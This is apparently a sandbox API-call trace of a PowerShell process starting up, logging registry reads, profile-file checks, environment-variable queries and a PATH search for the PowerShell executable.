	[0316.855] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d6ac, lpData=0x1b7a63c0, lpcbData=0x12d6a8*=0x56 | out: lpType=0x12d6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d6a8*=0x56) returned 0x0
	[0316.855] CoTaskMemFree (pv=0x1b7a63c0) 
	[0316.855] RegCloseKey (hKey=0x2e8) returned 0x0
	[0316.856] CoTaskMemAlloc (cb=0x20c) returned 0x305fe0
	[0316.856] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x305fe0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0316.856] CoTaskMemFree (pv=0x305fe0) 
	[0316.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0316.856] CoTaskMemAlloc (cb=0x20c) returned 0x305fe0
	[0316.856] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x305fe0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0316.856] CoTaskMemFree (pv=0x305fe0) 
	[0316.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0316.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0316.857] SetErrorMode (uMode=0x1) returned 0x1
	[0316.857] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d6c0 | out: lpFileInformation=0x12d6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0316.857] SetErrorMode (uMode=0x1) returned 0x1
	[0316.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0316.858] SetErrorMode (uMode=0x1) returned 0x1
	[0316.858] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d6c0 | out: lpFileInformation=0x12d6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0316.858] SetErrorMode (uMode=0x1) returned 0x1
	[0316.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0316.858] SetErrorMode (uMode=0x1) returned 0x1
	[0316.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d6c0 | out: lpFileInformation=0x12d6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0316.858] SetErrorMode (uMode=0x1) returned 0x1
	[0316.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0316.858] SetErrorMode (uMode=0x1) returned 0x1
	[0316.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d6c0 | out: lpFileInformation=0x12d6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0316.858] SetErrorMode (uMode=0x1) returned 0x1
	[0316.859] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.859] CoTaskMemFree (pv=0x3a7540) 
	[0316.859] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.859] CoTaskMemFree (pv=0x3a7540) 
	[0316.860] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.860] CoTaskMemFree (pv=0x3a7540) 
	[0316.861] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.861] CoTaskMemFree (pv=0x3a7540) 
	[0316.863] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.863] CoTaskMemFree (pv=0x3a7540) 
	[0316.863] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e8
	[0316.863] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x39c
	[0316.863] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0
	[0316.863] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0316.863] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0316.863] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x30c
	[0316.864] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0316.864] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0316.864] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x338
	[0316.864] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x33c
	[0316.864] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0316.864] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0316.865] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.865] CoTaskMemFree (pv=0x3a7540) 
	[0316.866] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0316.867] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.867] CoTaskMemFree (pv=0x3a7540) 
	[0316.869] SetEvent (hEvent=0x334) returned 1
	[0316.869] SetEvent (hEvent=0x2e8) returned 1
	[0316.869] SetEvent (hEvent=0x39c) returned 1
	[0316.869] SetEvent (hEvent=0x3a0) returned 1
	[0316.869] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0316.871] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.871] CoTaskMemFree (pv=0x3a7540) 
	[0316.872] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5f8 | out: phkResult=0x12d5f8*=0x3a4) returned 0x0
	[0316.872] RegQueryValueExW (in: hKey=0x3a4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12d57c, lpData=0x0, lpcbData=0x12d578*=0x0 | out: lpType=0x12d57c*=0x0, lpData=0x0, lpcbData=0x12d578*=0x0) returned 0x2

Thread:
	id = 87
	os_tid = 0x9cc


Thread:
	id = 93
	os_tid = 0xa34


Thread:
	id = 104
	os_tid = 0x64


Thread:
	id = 111
	os_tid = 0x750


Thread:
	id = 112
	os_tid = 0x5f0

	[0252.991] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0291.989] LocalFree (hMem=0x3172c0) returned 0x0
	[0291.989] CloseHandle (hObject=0x324) returned 1
	[0291.990] CloseHandle (hObject=0x13) returned 1
	[0291.990] CloseHandle (hObject=0xf) returned 1
	[0291.991] RegCloseKey (hKey=0x310) returned 0x0
	[0291.991] RegCloseKey (hKey=0x30c) returned 0x0
	[0291.991] RegCloseKey (hKey=0x308) returned 0x0
	[0291.991] LocalFree (hMem=0x317290) returned 0x0
	[0291.991] RegCloseKey (hKey=0x330) returned 0x0
	[0297.910] RegCloseKey (hKey=0x334) returned 0x0
	[0302.309] RegCloseKey (hKey=0x390) returned 0x0
	[0302.309] RegCloseKey (hKey=0x38c) returned 0x0
	[0302.309] RegCloseKey (hKey=0x388) returned 0x0
	[0302.309] RegCloseKey (hKey=0x384) returned 0x0
	[0302.310] RegCloseKey (hKey=0x380) returned 0x0
	[0302.310] RegCloseKey (hKey=0x37c) returned 0x0
	[0302.310] RegCloseKey (hKey=0x354) returned 0x0
	[0302.311] RegCloseKey (hKey=0x3ac) returned 0x0
	[0302.311] RegCloseKey (hKey=0x374) returned 0x0
	[0302.311] RegCloseKey (hKey=0x370) returned 0x0
	[0302.311] RegCloseKey (hKey=0x36c) returned 0x0
	[0302.312] RegCloseKey (hKey=0x368) returned 0x0
	[0302.312] RegCloseKey (hKey=0x364) returned 0x0
	[0302.312] RegCloseKey (hKey=0x360) returned 0x0
	[0302.312] RegCloseKey (hKey=0x35c) returned 0x0
	[0302.313] RegCloseKey (hKey=0x358) returned 0x0
	[0302.313] RegCloseKey (hKey=0x3a8) returned 0x0
	[0302.313] RegCloseKey (hKey=0x3a4) returned 0x0
	[0302.313] RegCloseKey (hKey=0x348) returned 0x0
	[0302.314] RegCloseKey (hKey=0x344) returned 0x0
	[0302.314] RegCloseKey (hKey=0x340) returned 0x0
	[0302.314] RegCloseKey (hKey=0x33c) returned 0x0
	[0302.314] RegCloseKey (hKey=0x338) returned 0x0
	[0302.315] RegCloseKey (hKey=0x324) returned 0x0
	[0302.315] RegCloseKey (hKey=0x310) returned 0x0
	[0302.315] RegCloseKey (hKey=0x30c) returned 0x0
	[0302.316] RegCloseKey (hKey=0x330) returned 0x0
	[0302.316] RegCloseKey (hKey=0x334) returned 0x0
	[0302.316] RegCloseKey (hKey=0x3a0) returned 0x0
	[0302.316] RegCloseKey (hKey=0x39c) returned 0x0
	[0302.316] RegCloseKey (hKey=0x378) returned 0x0
	[0302.317] RegCloseKey (hKey=0x3b0) returned 0x0
	[0302.317] RegCloseKey (hKey=0x394) returned 0x0
	[0641.599] RegCloseKey (hKey=0x3b4) returned 0x0
	[0641.599] RegCloseKey (hKey=0x3a4) returned 0x0

Thread:
	id = 193
	os_tid = 0x9a8


Thread:
	id = 288
	os_tid = 0xe38

	[0317.510] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0317.514] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0317.518] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.518] CoTaskMemFree (pv=0x3a7540) 
	[0317.520] VirtualQuery (in: lpAddress=0x1c84dde0, lpBuffer=0x1c84eca0, dwLength=0x30 | out: lpBuffer=0x1c84eca0*(BaseAddress=0x1c84d000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.523] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.523] CoTaskMemFree (pv=0x3a7540) 
	[0317.526] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.526] CoTaskMemFree (pv=0x3a7540) 
	[0317.529] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.530] CoTaskMemFree (pv=0x3a7540) 
	[0317.842] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.842] CoTaskMemFree (pv=0x3a7540) 
	[0317.845] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.845] CoTaskMemFree (pv=0x3a7540) 
	[0317.846] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.847] CoTaskMemFree (pv=0x3a7540) 
	[0317.851] VirtualQuery (in: lpAddress=0x1c84e090, lpBuffer=0x1c84ef50, dwLength=0x30 | out: lpBuffer=0x1c84ef50*(BaseAddress=0x1c84e000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.852] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.852] CoTaskMemFree (pv=0x3a7540) 
	[0317.858] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.858] CoTaskMemFree (pv=0x3a7540) 
	[0317.858] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.858] CoTaskMemFree (pv=0x3a7540) 
	[0317.860] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.860] CoTaskMemFree (pv=0x3a7540) 
	[0317.864] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0317.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0317.864] CoTaskMemFree (pv=0x3a7540) 
	[0318.200] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.200] CoTaskMemFree (pv=0x3a7540) 
	[0318.202] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.202] CoTaskMemFree (pv=0x3a7540) 
	[0318.203] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.203] CoTaskMemFree (pv=0x3a7540) 
	[0318.206] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.206] CoTaskMemFree (pv=0x3a7540) 
	[0318.208] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.208] CoTaskMemFree (pv=0x3a7540) 
	[0318.209] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.209] CoTaskMemFree (pv=0x3a7540) 
	[0318.211] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.211] CoTaskMemFree (pv=0x3a7540) 
	[0318.509] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.509] CoTaskMemFree (pv=0x3a7540) 
	[0318.859] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.860] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0318.860] CoTaskMemFree (pv=0x3a7540) 
	[0318.862] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0318.862] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0318.862] CoTaskMemFree (pv=0x3a7540) 
	[0318.862] CoTaskMemAlloc (cb=0x128) returned 0x1b7ab8b0
	[0318.862] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7ab8b0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0318.863] CoTaskMemFree (pv=0x1b7ab8b0) 
	[0318.867] CoTaskMemAlloc (cb=0x20e) returned 0x307c50
	[0318.867] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x307c50 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0318.868] CoTaskMemFree (pv=0x307c50) 
	[0318.871] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0318.873] SetErrorMode (uMode=0x1) returned 0x1
	[0318.876] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.845] SetErrorMode (uMode=0x1) returned 0x1
	[0324.468] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.468] SetErrorMode (uMode=0x1) returned 0x1
	[0324.468] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.476] SetErrorMode (uMode=0x1) returned 0x1
	[0324.478] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.478] SetErrorMode (uMode=0x1) returned 0x1
	[0324.478] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.486] SetErrorMode (uMode=0x1) returned 0x1
	[0324.489] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.489] SetErrorMode (uMode=0x1) returned 0x1
	[0324.489] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.497] SetErrorMode (uMode=0x1) returned 0x1
	[0324.498] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.498] SetErrorMode (uMode=0x1) returned 0x1
	[0324.498] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.347] SetErrorMode (uMode=0x1) returned 0x1
	[0325.348] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.348] SetErrorMode (uMode=0x1) returned 0x1
	[0325.348] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.356] SetErrorMode (uMode=0x1) returned 0x1
	[0325.358] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.358] SetErrorMode (uMode=0x1) returned 0x1
